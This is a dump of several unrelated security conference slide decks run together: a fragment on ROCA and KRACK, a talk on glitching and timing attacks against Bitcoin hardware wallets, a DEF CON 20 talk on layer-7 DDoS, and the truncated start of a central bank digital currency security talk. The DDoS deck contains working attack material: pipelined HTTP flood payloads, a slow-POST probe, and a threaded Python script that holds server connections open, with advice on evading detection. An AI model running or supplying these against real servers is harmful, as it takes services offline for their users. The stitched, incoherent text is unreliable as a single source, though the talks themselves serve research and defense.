140.8 CPU years to factor an RSA-2048
modulus produced by Infineon chips
Impacts
At least tens of millions of devices around the world are affected
https://crocs.fi.muni.cz/public/papers/rsa_ccs17
Morals
Taking shortcut to enhance efficiency
– might compromise security
– hence very dangerous
Secret crypto design
– delays the discovery of flaws
– hence impacts are increased
References
KRACK
– https://www.krackattacks.com
ROCA
– https://crocs.fi.muni.cz/public/papers/rsa_ccs17
Thank You!
Breaking Bitcoin Hardware Wallets
Glitches cause stitches!
Josh Datko
Chris Quartier
Kirill Belyayev
Updated: 2017/07/07
Link Drop!
All updated references, notes, links, can be found here:
https://www.cryptotronix.com/breakingbitcoin
The bug that started it all

bool storage_is_pin_correct(const char *pin)
{
    return strcmp(shadow_config.storage.pin, pin) == 0;
}
On the STM32F205, when the first pin character is wrong it returns
in 100ns. When the fourth was wrong, it returned in about 1100ns.
If this was there, what else could we find?
Broken Window Theory for Bugs
Initial Attack Plan
1. Send change_pin via Python.
2. Watch the return over USB; measure when the PIN failed.
3. Profit?!
Prevents retries with a busy wait loop.
Back off timer
ChipWhisperer [1]
This talk: Fault Attacks × Bitcoin Hardware Wallets × ChipWhisperer
One slide intro to Fault Attacks
Definition
An attack that applies an external stress to an electronic system, which generates a security failure [2].
Two Parts:
1. Fault Injection
◦ Vcc glitching
◦ Clock glitching
2. Fault Exploitation
◦ Nicolas Bacca suggested glitching flash ops [3]; we wanted to bypass the PIN as it was closer to ChipWhisperer examples.
Our Motivation
What happens when you apply the ChipWhisperer to the
STM32F205 (F205)?
# Is the F205 vulnerable to fault injection?
# Is the TREZOR firmware exploitable via a fault?
# How do we raise awareness for these kinds of attacks?
We just press the glitch button right?
# Turns out, you can’t just
shake the wallet and have
BTC fall out.
# Requires some RE to
determine voltages, test
points, how to modify the
firmware, etc...
# HW Wallets went OOS :(
Exhaust the supply chain
How to slow down attacks
The Fail Train Cometh
# Clock glitching kinda worked? It made Windows USB very sad
:(
# Rebooting unsigned firmware is teh suck (buttons to press).
# Timing analysis was working, but power analysis with CW was
not.
# Logic level conversion is proof that the singularity is far away.
# Lots of scotch.
Or why don’t we just make our own TREZOR?
F-it dude, let’s go bowling.
And now for something completely different
Before we get to the new hardware, we tried two other paths.
# De-scrambling the pin via OpenCV to automate testing.
# Decapping the STM32F205
I spy with my little eye
Decap all the things!
We are silicon n00bs
# TBH, I just wanted a cool silicon pic for DEF CON :)
# Decapping-as-a-Service exists though (Dangerous
Prototypes)
# I asked smarter people about this:
◦ Cheap images don’t tell you much.
◦ Some interconnects are exposed.
◦ Maybe flip bits during runtime?
All the decap pics are on the website.
Want more pics?
Breaking Bitcoin Board
# Fits the ChipWhisperer UFO format
# It is also a TREZOR clone.
# Through-hole XTAL for more fun :)
# On board glitch hardware to attack without a ChipWhisperer
Glitch on the cheap
A better setup
There’s always a Rev B
Loop, what loop?

void glitch1(void)
{
    // Some fake variable
    volatile uint8_t a = 0;

    putch('A');

    // Should be an infinite loop
    while (a != 2) { ; }

    uart_puts("1234");
    while (1) { ; }
}
Ooof, that hurts

void glitch_infinite(void)
{
    char str[64];
    unsigned int k = 0;
    // This also adds lots of SRAM access
    volatile uint16_t i, j;
    volatile uint32_t cnt;

    while (1) {
        cnt = 0;
        trigger_high();
        trigger_low();
        for (i = 0; i < 200; i++) {
            for (j = 0; j < 200; j++) {
                cnt++;
            }
        }
        sprintf(str, "%lu %d %d %d\n", cnt, i, j, k++);
        uart_puts(str);
    }
}
O Password, My Password

void glitch3(void)
{
    char passwd[] = "touch";
    char passok = 1;

    for (cnt = 0; cnt < 5; cnt++) {
        if (inp[cnt] != passwd[cnt]) {
            passok = 0;
        }
    }

    if (!passok) {
        uart_puts("Denied\n");
        while (1);
    } else {
        uart_puts("Welcome\n");
    }

    led_error(1); led_error(1); led_error(1);
}
Ok, how’d we do
# Is the F205 vulnerable to fault injection?
◦ Absolutely, yes.
# Is the TREZOR firmware exploitable via a fault?
◦ Maybe? We have thoughts on how to trigger but going from
example to exploit takes some work still.
◦ We talked to TREZOR and KeepKey about some issues.
# How do we raise awareness for these kinds of attacks?
◦ While not quite an unlooper device, our PCB will help you find
the BORE (Break Once Run Everywhere) attack.
Summary of Vulnerabilities
# STM32F205 is susceptible to fault attacks.
# KeepKey had a timing analysis bug in PIN verification.
# TREZOR (and all clones) did not enable Clock Security System
in the MCU, allowing injection of clock faults.
# A few pieces of code could be made more resilient.
Don't lose physical control of your wallet.
You really want to set PIN plus password.
Takeaway for wallet users
You will be glitched–can you trust your clock and VCC?
Takeaway for wallet designers
Defenses from Fault Attacks
Write code assuming you will be glitched! (Riscure RSA 2008 [4]
and The Sorcerer's Apprentice Guide to Fault Attacks.)
# Don't use 0 and not-0 flags; use constants with a large Hamming distance. (See the sketch below.)
# Count your functions!
# Check for complete loop completion.
# Add random delay – makes triggering a bit harder.
# Check sensitive operations multiple times and compare results.
# Use multiple MCUs and check results?!
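A minimal C sketch of the first and fifth points (the constants and the check_pin/unlock_wallet/lockout functions are invented for illustration):

#include <stdint.h>

#define PIN_OK  0xA5C3u   /* constants with a large Hamming distance */
#define PIN_BAD 0x5A3Cu

void handle_pin(const char *entered)
{
    volatile uint16_t status = PIN_BAD;

    status = check_pin(entered);        /* returns PIN_OK or PIN_BAD */
    if (status == PIN_OK) {
        /* re-check: a single glitch should not flip both comparisons */
        if (check_pin(entered) == PIN_OK) {
            unlock_wallet();
        }
    }
    if (status != PIN_OK) {
        lockout();
    }
}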
Live Demo!
Let’s see some glitches!!!
Chipwhisperer vs. STM32F205
Endnotes
1https://wiki.newae.com/File:Cwlite_basic.png
2Encyclopedia of Cryptography and Security, 2nd Edition.
3https://www.slideshare.net/EricLarcheveque/bitcoin-hardware-wallets-security
4https://cryptotronix.files.wordpress.com/2017/07/paper_side_channel_
patterns.pdf | pdf |
DDoS Black and White
“Kungfu” Revealed
(DEF CON 20 Edition)
{Tony Miu (aka MT),
Anthony Lai (aka Darkfloyd),
Alan Chung (aka Avenir),
Kelvin Wong (aka Captain)}
Valkyrie-X Security Research Group
(VXRL)
Disclaimer
• There are no national secrets leaked here.
• Welcome to all national spies
• No real attacks are launched
• Please take it at your own risk. We can't save you from jail.
Agenda
• Members introduction
• Research and Finding
– Part 1: Layer-7 DoS vulnerability analysis
and discovery.
– Part 2: Powerful Zombie
– Part 3: Defense Model
Biographies
Tony Miu (aka MT)
•Apart from being a researcher at VXRL, MT currently
holds the post of Deputy SOC Manager at Nexusguard
Limited, a global provider of premium end to end web
security solutions that specializes in Anti-DDoS & web
application security services. Throughout his tenure, MT
has been at the forefront of the cyber war zone -
responding to and mitigating myriads of cyber attacks that
comes in all forms and manners targeted at crushing their
clients' online presence.
•MT's task is clearly critical. It is therefore imperative that
MT be well versed in the light and dark sides of DDoS
attack methodologies and undertake a leading role in
both DDoS kungfu and defense model projects.
Biographies
Anthony Lai (aka Darkfloyd)
• focuses on reverse engineering and malware
analysis as well as penetration testing. His
interests always fall on CTFs and analyzing
targeted attacks.
• He has spoken in Black Hat USA 2010, DEF
CON 18 and 19, AVTokyo 2011, Hack In Taiwan
2010 and 2011 and Codegate 2012.
• His most recent presentation at DEF CON was
about APT Secrets in Asia.
Biographies
Alan Chung (aka Avenir)
• Avenir has more than 8 years of working
experience on Network Security. He currently is
working as a Security Consultant for a
Professional Service provider.
• Alan specializes in Firewall, IDS/IPS, network
analysis, pen-test, etc. Alan’s research interests
are Honeypots, Computer Forensics,
Telecommunication etc.
Biographies
Kelvin Wong (aka Captain)
• Has worked in law enforcement for over 10 years,
responsible for forensics examination and
investigation; research and analysis.
• Deals with various reported criminal cases
about Hacking, DDoS and network
intrusion;
• A real frontline officer who fights against criminals and suspects.
Research and Findings
Research Methodology
• We have applied Layer 7 techniques for
DoS:
– HTTP GET and POST methods
– Malformed HTTP
– HTTP Pipelining
– Manipulate TCP x HTTP vulnerabilities
Techniques Overview : Pre-Attack
• Find out any HTTP allowed methods
• Check whether a site accepts POST method as well
even if it accepts the GET method in the Web form
• Check out any resource-intensive function like
searching and any function related to database retrieval.
• Check out any HTTP response with large payload
returned from the request.
• Check out any links with large attachment including .doc
and .pdf files as well as media (.mp4/mp3 files) (i.e.
JPEG could be cached)
• Check whether HTTP response is cached or not
• Check whether chunked data in HTTP response packet
from the target is allowed.
Techniques Overview :
Attack Techniques
Attack Combo #1:
• Manipulate the TCP and HTTP characteristics
and vulnerabilities
• Find a URL which accepts POST -> change the Content-Length to 9999 bytes (i.e. an abnormal size > 1500 bytes) -> see whether it keeps the connection alive (a probe sketch follows)
(Attack Combo #1 Detailed explanation in Part 2)
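A minimal Python probe for this check (the host and the 600-second cap are placeholders; test only against servers you own):

import socket, time

def probe(host, path="/"):
    hdr = ("POST %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: Mozilla/4.0\r\n"
           "Content-Length: 9999\r\nConnection: keep-alive\r\n\r\n") % (path, host)
    s = socket.create_connection((host, 80))
    s.sendall(hdr.encode())     # header only; the promised body never comes
    s.settimeout(600)
    t0 = time.time()
    try:
        data = s.recv(4096)     # blocks until the server responds or gives up
    except socket.timeout:
        data = b""
    print("held for %.1fs, reply: %r" % (time.time() - t0, data[:80]))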
Techniques Overview :
Post-Attack Techniques
Attack Combo #1:
With POST method allowed, we could guess and
learn the behavior and devices behind:
• Check the TCP established state timeout value
• Check the TCP first PSH/ACK timeout value
• Check the TCP continuous ACK timeout value
• Check the TCP first FIN_WAIT1 timeout value
• Check the TCP last ACK timeout value
• It is an incomplete HTTP packet, which cannot be detected and is treated as a data chunk.
Techniques Overview :
Post-Attack Techniques
Attack Combo #1 (Continue):
• Wait for FIN/ACK – Initiated by target’s server
• Wait for RST/ACK – Initiated by requestor,
target’s server or CDN
• Wait for RST – Initiated by device like IDS, IPS,
etc
• Submit a packet to the target with wrong IP
checksum and check whether there is any
replied packet.
Techniques Overview :
Post-Attack Techniques
Goals
• Calculation of resources to bring down the
target
• Estimation of the detection
• Guess its DDoS mitigation
• Submit an incomplete HTTP POST packet
attack to the back-end server.
Techniques Overview :
Attack Techniques
Attack Combo #2:
• Manipulate the vulnerabilities due to poor
server hardening.
• Accept incomplete HTTP request (i.e.
accept simple HTTP request connection
including fields like HOST, Connection and
ACCEPT only)
Simple GET attack pattern from 4 years ago
• GET / HTTP/1.1\r\n
Host: www.xxx.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n\r\n
• The site does not check the cookie value or the referrer value.
• It means there is NO HARDENING
• The User-Agent value Mozilla/4.0\r\n is a label commonly used by botnets; however, the site still accepts it
Techniques: Attack Techniques
Attack Combo #2:
• Whether it accepts HTTP pipelining
– It is an RFC standard but rarely used
GET / HTTP/1.1\r\nHost: www.xxxxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\n")
Techniques: Attack Techniques
Attack Combo #2:
- Utilize the packet size with 1460 byte size in
PSH/ACK packet
- A packet could be multiplied 7 times or more
- For pipelining, for example, HTTP packet is
not properly ended without \r\n\r\n, which may
bypass the detection and filter, as it is not
deemed as a HTTP packet.
Techniques: Attack Techniques
Attack Combo #2:
• Finding large-size packet data payload like
picture and audio files, which could not be
cached and authentication check (like
CAPTCHA) in prior.
• Goals:
– Increase loading of server and CPU and
memory usage
– Increase the bandwidth consumption
Techniques: Attack Techniques
Attack Combo #2:
• Session – Force to get a new session and connection
without cache. It could “guarantee” bypass loadbalancer
and Proxy.
• It is hard to remove it.
• If trying to drop the URL with “?”, it causes dropping the
normal request:
– For example, http://www.abc.com/submitform.asp?
234732893845DS4fjs9....
– Cache:no cache and expiry date is 1994
Techniques: Attack Techniques
•
Attack Combo #2
GET /download/doc.pdf?121234234fgsefasdfl11 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl22 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl33 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl44 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
Techniques: Attack Techniques
•
Attack Combo #2
GET /download/doc.pdf?121234234fgsefasdfl55 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl66 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl77 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl88 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep alive\r\n\r\n
We follow RFC all the time
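A minimal Python sender for a pipelined blob like the ones above (the target host and request count are placeholders; point it only at a server you own):

import socket

req = ("GET /?%d HTTP/1.1\r\nHost: www.example.com\r\n"
       "User-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n")
blob = "".join(req % i for i in range(12)) + "\r\n"   # only the last request ends with \r\n\r\n
s = socket.create_connection(("www.example.com", 80))
s.sendall(blob.encode())
print(s.recv(4096)[:200])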
Our Test Targets
•United States (40)
•Europe (20)
•Asia Pacific (20)
Case Studies:
It will be discussed on stage
Agenda
• Members introduction
• Research and Finding
– Part 1: Layer-7 DoS vulnerability analysis and
discovery.
– Part 2: Core Attack Concept and Empower
a Zombie
– Part 3: Defense Model
Before taking Appetizer, let us
do the demo
Let us give three demos:
Attack Server: Backtrack 5, 512M Ram, 2 CPU (VM)
Web Server: Windows server 2008 R2, IIS 7.5 with a text web
page, 2G RAM, no application and database, hardware PC.
1.Attack target server and stuck TCP state TIME_WAIT
2.Attack target server and stuck TCP state FIN_WAIT1
3.Attack target server and stuck TCP state Established
Attack Goal
Demo 1: Cause the server to become unstable
Demo 2: Cause the unavailability of service
in a minute
Demo 3: Cause the unavailability of service
instantly
Demo time
What are the theories and
ideas behind Demos 1-3?
Core Attack Concept
•
Don't focus on the HTTP method. The server is not killed by an HTTP-related vulnerability.
Otherwise,
•
HTTP GET flood - unstable and high CPU
•
HTTP POST flood - unstable and high CPU
•
HTTP HEAD flood - unstable and high CPU
•
HTTP XXX flood - xxxx and high xxxx only
•
Demo 1 attack also unstable and high CPU only
We are not DoSing the OS or the Programming Language
•
Those attacks target a specific OS or programming language, e.g. Apache Killer, etc.
•
Our Attack FOCUS is on Protocol – TCP and
HTTP, we are going to do a TCPxHTTP killer.
•
Any server not using TCP and HTTP?
We do not present IIS killer, Apache killer, Xxx
killer!!!
TCP state is the key
• Focus on TCP state.
• Use the HTTP as an example to control the TCP state.
• Manipulate the TCP and HTTP characteristics and
vulnerabilities
• Server will reserve resource for different TCP states.
• The same Layer-7 flood against different targets can stick different TCP states.
• The TCP state attacked is decided case by case, depending on the web application, OS and HTTP method.
• The key is based on reply of server. E.g. Fin-Ack, RST,
RST-Ack, HTTP 200, HTTP 30…etc.
Logical Diagram
(King of Fighters analogy)
Super combo period = TCP state
Health point = server resources
Hits = TCP connections
Kyo = attack server
Super combo = HTTP request
Andy on fire (high CPU) = web server
Keep Super Combo to Andy
•We wish to extend the super combo period!!!
•We will discuss the 3 different TCP states.
•Targeted TCP state:
• Demo 1. TCP TIME_WAIT
• Demo 2. TCP FIN_WAIT_1
• Demo 3. TCP ESTABLISHED
P.S. In King of Fighters 2003, it is a bug.
Demo 1. TCP STAT TIME_WAIT
From RFC:
“When a connection is closed actively, it MUST linger in TIME-WAIT
state for a time 2xMSL (Maximum Segment Lifetime). However, it
MAY accept a new SYN from the remote TCP to reopen the connection
directly from TIME-WAIT state, if it:
(1)assigns its initial sequence number for the new connection to be
larger than the largest sequence number it used on the previous
connection incarnation, and
(2) returns to TIME-WAIT state if the SYN turns out to be an old
duplicate”
Demo 1. TCP STAT TIME_WAIT
•Demo 1 is simulating the most common DDoS attack.
•RFC: “Server is waiting for a connection termination
request from the local user.” Depends on OS, time out
around 60s.
•The web server only suffers high CPU usage and becomes unstable
Demo 1. TCP STAT TIME_WAIT
Just like a light punch, easy to defend against~
Fix:
•Harden Server TCP parameters
•Most of network security devices can set the timeout (e.g.
Proxy, firewall, DDoS mitigation device)
Demo 1. TCP STAT TIME_WAIT
Demo 1 – The Key for goal
• Check the TCP last ACK timeout value
• Wait for RST – Initiated by device like
IDS, IPS, etc.
Demo1 – The Key for Goal
TBC
Demo 2. TCP FIN_WAIT_1
Demo 2. TCP FIN_WAIT_1
From RFC:
“FIN-WAIT-1 STATE
In addition to the processing for the ESTABLISHED state, if our FIN is now acknowledged then
enter FIN-WAIT-2 and continue processing in that state.
FIN-WAIT-2 STATE
In addition to the processing for the ESTABLISHED state, if the retransmission queue is empty,
the user's CLOSE can be acknowledged ("ok") but do not delete the TCB.
CLOSE-WAIT STATE
Do the same processing as for the ESTABLISHED state.
CLOSING STATE
In addition to the processing for the ESTABLISHED state, if the ACK acknowledges our FIN then
enter the TIME-WAIT state, otherwise ignore the segment.
LAST-ACK STATE
The only thing that can arrive in this state is an acknowledgment of our FIN. If our FIN is now
acknowledged, delete the TCB, enter the CLOSED state, and return.
TIME-WAIT STATE
The only thing that can arrive in this state is a retransmission of the remote FIN. Acknowledge it,
and restart the 2 MSL timeout.”
Demo 2. TCP FIN_WAIT_1
•Depending on the OS, the timeout is around 60s and hard to fine-tune on the server.
•RFC: “Client can still receive data from the server but will no longer accept
data from its local application to be sent to the server.”
•Server will allocate resource to handle web service
•Web application will keep holding the resource and memory overflow during
the attack
•Most of network security devices can set the timeout value, but easy to crush
the web application….
Demo 2 - The Key for goal
• Check the TCP first FIN_WAIT1 timeout
value
• Wait for RST/ACK – Initiated by
requestor, target’s server or CDN
Demo 2 - The Key for goal
TBC
Demo 3. TCP Established
Demo 3. TCP Established
•RFC: ” represents an open connection, data received can be delivered to the
user. The normal state for the data transfer phase of the connection.”
•TCP Established, it is an active connection.
•The server will allocate a lot of resources to handle the web service and web application.
•The time out of TCP Established state is very long. (around 3600s)
•The time out of TCP Established state can’t be too short.
•Compared with all other TCP states, this case uses the most resources on the server.
Demo 3. TCP Established
•
Based on the design of the HTTP method, we can force the server to use more resources (see the sketch after this list).
•
Fragmented and incomplete packet continuously
•
In this example:
-
HTTP POST Method + “Content-length: 99999”
•
HTTP GET Method with packet size over 1500 without
“\r\n\r\n”, are same result.
•
It is an incomplete HTTP request
•
Timeout depends on application and server, may be 30s, 5mins,
10mins or more.
•
Incomplete HTTP request can bypass the Network Security devices.
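A sketch of such a connection holder in Python (the host, port and concurrency level are placeholders; for testing against your own lab server only):

import socket, threading

HOST, CONNS = "192.168.1.10", 200

def hold():
    s = socket.create_connection((HOST, 80))
    hdr = ("POST / HTTP/1.1\r\nHost: %s\r\nUser-Agent: Mozilla/4.0\r\n"
           "Content-Length: 99999\r\nConnection: keep-alive\r\n\r\n") % HOST
    s.sendall(hdr.encode())   # incomplete POST: the 99999-byte body never comes
    s.recv(1)                 # block; the socket stays in ESTABLISHED

for _ in range(CONNS):
    threading.Thread(target=hold, daemon=True).start()
threading.Event().wait()      # keep the holders alive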
Demo 3. Vs Slowloris
Slowloris:
Slowloris extends the TCP Established state of ONE connection. It is like digging a hole (the HTTP request) in the ground (server resources) and filling it with water (packets) slowly.
Our Demo 3
Our Demo 3 finds out the maximum size of the hole and digs many holes. The size is random.
Demo 3 - The Key for goal
•
Check the TCP establishment timeout value
•
Check the TCP first PSH/ACK timeout value
•
Check the TCP continuous ACK timeout value
•
Wait for FIN/ACK – Initiated by target’s server
•
Submit a packet to the target with wrong IP checksum
and check whether there is any replied packet.
•
It is an incomplete HTTP packet, which cannot be
detected and it is treated as a data trunk.
Demo 3 - The Key for goal
TBC
Attack Conclusion
For Demos 1-3
•
Signature-based detection is not useful against our attack, as the HTTP fields can be randomized.
•
Our attack is customized for each target individually.
•
For example, the content length is decided based on the
Web application and test the boundary values of rate limit
of any security and detection devices.
•
Confuse the security detection device with “look-like” real
HTTP request.
PoC of Case study
• Slowloris is a good example for Demo 3
• Demo 1-3 are PoC for the analysis result
and impact in Part 1.
We have a great weapon and need the best soldier
Before empowering the Zombie…
Let us give another demo:
Attack Server: Backtrack 5, 512M Ram, 2 CPU (VM)
Web Server: Windows server 2008 R2, IIS 7.5 with a text web
page, 2G RAM, no application and database, hardware PC.
Attack Goal
Empower a Zombie “without” establishing
any connection or intensive use of memory
and CPU
Demo
• We launched the attack with our designed
Zombie (in demo 4) with stuck TCP
Establish state (in demo 3) technique
Demo time
Our Zombie’s Design
Design Overview
•
Current DDoS mitigation methods violate the RFC standard.
•
Our Zombie also adopts DDoS mitigation methods into
the design
•
Our Zombie's protocol design “looks like” it fulfills an RFC standard. We simply adopt DDoS mitigation methods and designs into our Zombie.
•
This soldier design is for our Demo 3 attack technique.
1. Show Attack Server’s
Resources Status
2. Generating an attack
3. Show the target’s server
status
4. Show attack server status
AFTER attack
Zombie Features
• Our designed zombie can launch attacks against multiple targets
• All available layer-7 attack methods (e.g.
XXX flood) could fuck up the target.
• Most of the victims stuck in TCP
established state.
Design and power-up your
zombie
It could have many different types of soldier.
E.g. Zombie + Syncookie, syncache, share
database with HTTP request……
Part 3: Defense Model
Existing DDoS mitigation
countermeasure
• TCP Layer Authentication
• HTTP Layer Authentication (redirect,
URL)
• HTTP Layer interrupt (Captcha)
• Signature base application detection
• Rate limit
Design Overview – Application
Gateway (AG)
• Develop an Apache module to defend against Layer-7 DDoS:
– Apache Web Service
– Hardened Apache Server
– Authentication code module
– Control Policy module
– Routing and Forwarding Engine
– GUI Control Panel
I have a Dream~
Apache Gateway with load-balancer group
Custom filter by script
All zombies suicide
All the DDoS attacks can be auto-mitigated
POST / GET Flood to AG
(First handshake phase)
Attack example : GET / HTTP/1.1 or GET /
<some-url, but not our page> / 1.1
•If the attack cannot be redirected
•
Check the HTTP fields and drop the non-standard HTTP request.
•
Close the connection, and afterwards, attack
suspended.
•
(Most zombies cannot handle the redirect)
POST / GET Flood to AG
(First handshake phase) (cont.)
• If the attack can be redirected
•
Response action
•
Redirect the Get Flood (Redirect 301) to phase 2, with new
session
•
Close the existing connection in AG
POST / GET Flood to AG
(Second handshake phase)
• The user sends the GET request with the HTTP Referrer field.
•
With Referrer (Allow Traffic):
•
Assign a checkable value and referrer value to the user’s
web browser
•
Optional: require the client side to run a formula in JavaScript; the result will be used in phase 3 (used to increase client-side CPU usage).
•
Redirect the request to phase 3 with new session
•
Close the current connection in AG
•
Without Referrer (Attack) (Drop Traffic) :
•
Close the connection
•
For HTTP POST request, it will be dropped instantly.
POST / GET Flood to AG
(Second handshake phase) (cont)
POST / GET Flood to AG
(Third handshake phase)
• The user sends the GET request to the
checking page with the checkable value
received in Phase 2.
•
Incomplete HTTP request will be dropped.
•
Set the passed traffic in the white list.
•
Set the connection limit per IP address
•
(eg. Block the IP address, over 10 request per minute.)
•
Set the limit per request, per URL
•
Set the time limit value.
•
Set the time out value.
7/11/12
Deploying mode
• Host mode
• E.g. develop a module in Apache
• Transparent mode
• Easy to deploy; sits in front of the Web server.
• Reverse proxy mode
• Easy to deploy
• Load balancer mode
• Same as proxy, but it cannot handle a high-volume
bandwidth attack.
Best deployment location
• Before the firewall, behind the router
• Analyzing and filtering the high-volume traffic happens in
the first place, so as to prevent a high-volume DoS attack.
• Behind the firewall (with content forwarding)
i. The firewall redirects the HTTP traffic to the Apache gateway
(e.g. Check Point CVP or Juniper UTM Redirect Web Filtering).
ii. After the HTTP traffic analysis, the clean traffic is sent
back to the firewall.
iii. The firewall continues to process the traffic by rule.
Best deployment location (cont’)
• Behind the firewall (route mode, proxy mode)
i. After the traffic analysis by the firewall, the traffic passes
to the Apache gateway.
ii. After the analysis, the clean traffic is routed to the web
server.
• Install & integrate with the web server
i. The traffic is input to the Apache gateway (filtering module).
ii. The Apache gateway (filtering module) completes its
analysis.
iii. The filtering module passes the traffic to the web page
module (or another web server program).
Best deployment location (cont’)
• Integrated with the load balancer
i. The HTTP traffic is input to the Apache Gateway.
ii. Apache processes & analyzes the HTTP traffic.
iii. The clean traffic is transferred to the load balancer.
iv. The load balancer shares the traffic across the
Web Server farm.
Roadmap
Phase 1: Integrate the IDS/IPS, Firewall
and black hole system with the
Layer-7 Anti-DDoS Gateway.
Phase 2: Develop the API for custom scripts.
Phase 3: Develop an IP-address blacklist grouped by
time, and a blacklist generation mechanism.
Thank you very much
for listening
Tony: mt[at]vxrl[dot]org
Alan: avenir[at]vxrl[dot]org
Kelvin: captain[at]vxrl[dot]org
Anthony: darkfloyd[at]vxrl[dot]org
Central bank digital currency
Threats and vulnerabilities
Defcon 29
Ian Vitek
CBDC Security
Central bank of Sweden, Sveriges Riksbank
Central bank digital currency
Threats and vulnerabilities
Presentation
Background
Detailed system description of the prototype
Vulnerabilities in the retail central bank digital currency prototype
Everything else
Solutions and summary
2
So where do we start?
Ian Vitek
• Started with pentests in 1996.
• Interested in web application security, network layer 2
(the writer of macof), DMA attacks and local pin bypass
attacks (found some on iPhone).
Sveriges Riksbank (Central bank of Sweden)
Disclaimer: The views and opinions expressed in this presentation are those of the
presenter and do not necessarily represent the views and opinions of the
Riksbank.
3
The e-krona project
• Why central bank digital currency?
• Procurement
• Requirements
• Winning bid
• Work on the prototype phase 1 (year one)
The goal of this presentation is to share insights into the
security challenges of building a prototype of a two-tier
retail central bank digital currency.
4
Detailed system description of the prototype
5
Detailed system description of the prototype
User
6
Detailed system description of the prototype
App
User
Security and logic, e.g.
•
PIN
•
Signing transactions
•
Encryption
7
Detailed system description of the prototype
App
Disk
User
Security and logic, e.g.
•
PIN
•
Signing transactions
•
Encryption
Storage of
•
PIN
•
Private key for tokens
•
Authentication keys
•
Message keys, e.g. Firebase
8
Detailed system description of the prototype
App
Disk
Security and logic, e.g.
•
PIN
•
Signing transactions
•
Encryption
Storage of
•
PIN
•
Private key for tokens
•
Authentication keys
•
Message keys, e.g. Firebase
9
Detailed system description of the prototype
App
Disk
PSP1
business
logic
Security and logic, e.g.
•
Authentication
•
Push messages, e.g. Firebase
•
Limits
•
Back office functions
10
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
Security and logic, e.g.
•
Authentication
•
Push messages, e.g. Firebase
•
Limits
•
Back office functions
Storage of
•
Authentication keys
•
Payment history
•
Customer data
•
Message keys, e.g. Firebase
11
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
PSP1
Corda
node
Security and logic, e.g.
•
Token transactions
•
Token verification
•
Wallet management
12
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
PSP1
Corda
node
Security and logic, e.g.
•
Token transactions
•
Token verification
•
Wallet management
Storage of
•
Public keys (and PSP1 private keys)
•
Wallets
•
Tokens
•
Backchain
•
Certificates
13
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Security and logic, e.g.
•
Issue and redeem
•
Token verification
•
Corda network management
14
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
DB
Security and logic, e.g.
•
Issue and redeem
•
Token verification
•
Corda network management
Storage of
•
Public keys (and Riksbank private keys)
•
Backchain
•
Certificates
15
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
DB
Security and logic, e.g.
•
Prevent double-spends
•
Sign the transaction
16
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
DB
DB
Security and logic, e.g.
•
Prevent double-spends
•
Sign the transaction
Storage of
•
Notary private key
•
Hashes of tokens
•
Certificates
17
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
